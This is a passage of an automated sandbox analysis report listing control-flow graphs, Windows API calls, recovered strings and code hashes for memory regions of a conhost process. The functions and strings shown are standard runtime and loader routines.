1d547837f0c-1d547837f21 call 1d547837c50 512->516 515->507 515->516 516->507 535 1d547837f23-1d547837f2d 516->535 521->512 549 1d547837ef5-1d547837efa 521->549 542 1d547837d85-1d547837d90 526->542 543 1d547837d61-1d547837d6b call 1d5478383b8 526->543 540 1d547837f2f-1d547837f32 535->540 541 1d547837f34-1d547837f42 535->541 546 1d547837f44 540->546 541->546 542->479 543->542 553 1d547837d6d-1d547837d7b 543->553 546->507 549->512 553->542 554->503 555 1d547837d27-1d547837d44 call 1d54783b3f0 554->555 555->503
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 0b088f540fd11a242bf5ed11a0688925eae4fc9c5e1027f6e02c8b9018dba42d
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: F681F330600F448AFFD0AB6D94813E97297EB85B82F444517AA0857796FB7AC8C187D3

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 558 1d547839aac-1d547839aea 559 1d547839af0-1d547839af3 558->559 560 1d547839b9e 558->560 561 1d547839ba0-1d547839bbc 559->561 562 1d547839af9-1d547839afc 559->562 560->561 563 1d547839b96 562->563 564 1d547839b02-1d547839b11 562->564 563->560 565 1d547839b1e-1d547839b3d LoadLibraryExW 564->565 566 1d547839b13-1d547839b16 564->566 569 1d547839b3f-1d547839b48 GetLastError 565->569 570 1d547839bbd-1d547839bd2 565->570 567 1d547839b1c 566->567 568 1d547839bdd-1d547839bec GetProcAddress 566->568 572 1d547839b89-1d547839b90 567->572 568->563 571 1d547839bee-1d547839bf9 568->571 573 1d547839b77-1d547839b81 569->573 574 1d547839b4a-1d547839b5f call 1d54783c4d8 569->574 570->568 575 1d547839bd4-1d547839bd7 FreeLibrary 570->575 571->561 572->563 572->564 573->572 574->573 578 1d547839b61-1d547839b75 LoadLibraryExW 574->578 575->568 578->570 578->573
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001D547839C6B,?,?,?,000001D54783945C,?,?,?,?,000001D547838F65), ref: 000001D547839B31
                                                  • GetLastError.KERNEL32(?,?,?,000001D547839C6B,?,?,?,000001D54783945C,?,?,?,?,000001D547838F65), ref: 000001D547839B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001D547839C6B,?,?,?,000001D54783945C,?,?,?,?,000001D547838F65), ref: 000001D547839B69
                                                  • FreeLibrary.KERNEL32(?,?,?,000001D547839C6B,?,?,?,000001D54783945C,?,?,?,?,000001D547838F65), ref: 000001D547839BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,000001D547839C6B,?,?,?,000001D54783945C,?,?,?,?,000001D547838F65), ref: 000001D547839BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: f6b1f83d3376f98310e04ef594924cde0fae5f3e4a6090de5d01db86681f1e78
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: 6C31A631312F50D1EF919B1A98007E92396FB54BA6F590626DD1D4BB90FF79C4C4C392
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 29b9a6bb16e762acf3558bb1cc44f90fff6a9b0d451809d6113de5222afbb47b
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: AC11B235310F4082EB918B52E86479967B2F398FE6F400216EA5E87B94FFB8C4848785
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: df58029f9c17943cc1a7629d7b1fae39821c6b04f4a76bfd06eda6e3c152df19
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: 04D18836208F8881DFB09B1AE49439A77B1F388B89F100516EACD477A9EF7DC591CB41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: 429cad06f89aa5166d88c2e9a9f068c213d91fc2dda977191faf4921205db992
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: 1851C471201F4595EF85DB2CED602D823A3FB0475AF840917A52D067A5FF7AD9A8C3C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $rbx-
                                                  • API String ID: 756756679-3661604363
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: da998feaeef9fbd6cfc6980b3972409d222f6e386a35c2d0e20bc4e393e26dbd
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 3531C132701F518BEF90DF1AE9403A9A3A2FB44B86F0940268F4807B55FF35C4E19781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: ca561e3ba84922566feaa27e1804e8616e83f71c79818b2740b21a85d79b45b5
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 7E119E32300E4182FFD86B3968157EE2253EB947A2F944626AC26563C6FF29D4E143C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: e43388f0d349bfb9cb948225f1c68845ddb24615ce580c87793598f51c9b181e
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: 60011735B04E4086EBA4DB16A85839963A2FB88FC2F8840369E9D53754FF79C985C781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: 604c94c65485c8f7b2f8fe28d2d32f7b996376fd4bc0c4cefd50b5d4d5abdb90
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 13014C79611F4082FFB49B25E85879973A2FB49B56F04012ACA4D167A4FF3EC4C8C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: 5529549bcb931ee1db56c06ae122cf2c254e7c10ac8adecf296d93c0db9c5d88
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: F5F04F72704E8592EFA08B25F9843996362F744BDAF844026DA4946954FFADC6C8CB41
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: fc4bb72f0d8177e1aebc1a02a3610586181342e86f604fced0773697e5b476ed
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: 82F08C74304F8082FF848B17B914199A762FB4AFC2F488032EE0A17B19FFACC4859781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: 3c4cfdcd54d5cb6987fed57181fa8c2be4bfa8c9d0f71db7c7f353667a79abfc
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 69F0B471300F0181EF948B24E8943E92732EB89762F54032BDA6A465E4FF7DC4C8D782
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: 184ce2cb98548fcf1365a0b25e7ffa2f97e11d737cd32f58e1f0f50a5dfd9d75
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: AF02EE32119F8486EBA0CB59F49039AB7A1F3C4795F100516EACE87BA8EF7DC494CB41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: b863743d6eab41057e41ec0c6a57ab7ef3eb92a20c3e2ba2116d24359393bc4b
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 1851E636704E0087EFE4CB1AE454A9A73A2F788B96F50411ADE4A43754FF3AC985CB81
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: 637bff7cca7261af4b61bdbf9149b6001b6acaf3391027faa976c213a0adfbb4
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 6551D635614E41C7EFA4CF1AE45069A73A2F788B96F50411ADE4A43754FF3AC885CB81
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: ca156e9b4eaca8ed8165aaa010d628b5846aa527650c93cb72248bc8d36cd39c
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: 3D61AD36519F44C6EBA08B29E49435AB7E2F388745F100516FA8D57BA8EB7DC580CF42
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 4a204e8a0e568c5cbed904437671c5b77e371690febe649902ad7951922c9eef
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 38114F36605F4093EFA49B25E40429AA7B2FB45B85F440127DE4D03BA4FB7EC994C7C5
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 5e4ed32701053208e9d3b8a2bcceca71f8b0ac64f058bc565f43916057c47231
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 3C51B332311E048ADF94CF19E448BAC7793F354B99F554222EA4A47788FB7AC8C1C791
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000003.2188818508.000001D547800000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D547800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_3_1d547800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 9216427dfdc600c46dc6c71f37b31bf2f6d300d721ec6af8d9d22f9c2c58b5d8
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 07516832204AC48AEFB48F21D5443987BE2F755B96F1A4117DB9947B95EB38C8D0CB83
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
